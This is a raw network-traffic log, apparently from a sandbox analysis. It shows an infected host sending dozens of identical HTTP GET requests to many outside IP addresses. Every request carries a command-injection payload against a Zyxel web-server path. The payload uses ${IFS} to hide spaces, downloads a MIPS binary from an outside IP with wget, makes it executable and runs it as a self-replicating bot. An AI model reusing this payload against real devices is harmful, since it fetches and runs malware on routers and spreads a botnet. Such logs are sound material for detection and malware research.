                                              Jan 29, 2024 07:02:58.498812914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              97192.168.2.1453182153.183.75.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498867989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              98192.168.2.144417452.107.157.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498899937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              99192.168.2.1453408211.92.215.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498945951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              100192.168.2.1455942172.99.60.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.498977900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              101192.168.2.1436462155.253.81.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499006987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              102192.168.2.1440150135.207.107.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499043941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              103192.168.2.144136286.254.213.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499078035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              104192.168.2.145960845.0.23.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499133110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              105192.168.2.1446230134.5.163.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499155045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              106192.168.2.1454702208.216.194.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499203920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              107192.168.2.14580945.72.235.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499243975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              108192.168.2.144760295.167.253.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499304056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              109192.168.2.14458944.121.20.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499607086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              110192.168.2.1438326139.2.131.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499645948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              111192.168.2.144419682.165.88.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499680996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              112192.168.2.145637837.236.114.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499744892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              113192.168.2.1458708131.149.168.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499756098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              114192.168.2.145367891.50.7.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499778986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              115192.168.2.1447994159.14.88.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499815941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              116192.168.2.144216478.151.64.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499875069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              117192.168.2.143433494.82.77.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.499948025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              118192.168.2.1453160122.113.157.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500008106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              119192.168.2.1449112170.112.51.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500036955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              120192.168.2.143432098.170.209.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500117064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              121192.168.2.1449108137.56.160.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500117064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              122192.168.2.1443206142.110.179.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500173092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              123192.168.2.144762264.114.127.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500252008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              124192.168.2.144100867.222.103.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500566959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              125192.168.2.1434794218.22.108.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500603914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              126192.168.2.1454936123.106.255.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500627041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              127192.168.2.1447236175.141.44.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500680923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              128192.168.2.1459038157.169.250.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500725031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              129192.168.2.1433154118.176.179.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500814915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              130192.168.2.1443058217.176.153.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500825882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              131192.168.2.143750052.134.228.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500863075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              132192.168.2.1453882118.108.161.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500926971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              133192.168.2.1459060209.5.197.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.500979900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              134192.168.2.1447432144.191.245.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501013041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              135192.168.2.145902254.22.106.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501075983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              136192.168.2.1444816104.119.227.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501102924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              137192.168.2.1446348193.135.15.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501137018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              138192.168.2.144842491.187.134.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501279116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              139192.168.2.145240441.214.69.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501478910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              140192.168.2.145688436.16.104.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501508951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              141192.168.2.1442756133.164.107.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501518965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              142192.168.2.1452334192.124.39.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501681089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              143192.168.2.143798659.207.215.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501682997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              144192.168.2.1454676177.212.253.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501738071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              145192.168.2.14388208.124.199.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.501770020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              146192.168.2.1439696142.16.9.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.502357006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              147192.168.2.1435628125.82.211.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.502393007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              148192.168.2.1446804211.224.165.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.502567053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              149192.168.2.1460984160.159.156.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.502923965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              150192.168.2.145838642.172.112.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.502939939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              151192.168.2.1452278154.24.82.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.502949953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              152192.168.2.1453200147.62.196.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.502976894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              153192.168.2.143611435.205.4.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.502980947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              154192.168.2.145174267.88.173.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503040075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              155192.168.2.1458758114.93.126.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503127098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              156192.168.2.1451624114.111.65.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503134012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              157192.168.2.1434384206.224.112.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503165007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              158192.168.2.145447049.168.55.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503170967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              159192.168.2.1442548179.150.51.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503175974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              160192.168.2.144846893.191.50.103443
                                              TimestampBytes transferredDirectionData
